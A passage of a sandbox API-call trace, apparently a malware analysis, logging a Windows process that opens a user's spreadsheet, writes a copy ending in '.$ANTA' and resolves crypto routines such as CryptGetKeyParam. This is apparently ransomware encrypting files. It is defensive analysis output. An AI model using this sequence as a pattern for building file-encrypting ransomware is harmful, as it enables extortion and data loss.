lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0077.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.040] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0077.040] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0077.041] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.041] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\mnsjU.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\mnsju.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0077.041] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.041] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.041] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0077.042] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.042] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.043] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\mnsjU.xlsx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\mnsju.xlsx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.043] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0077.043] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0077.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.047] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0077.047] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0077.049] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x1fc2, lpOverlapped=0x0) returned 1 [0077.049] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0077.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.053] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.053] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.053] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.053] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.054] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.054] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.054] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.055] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0077.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0077.057] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, 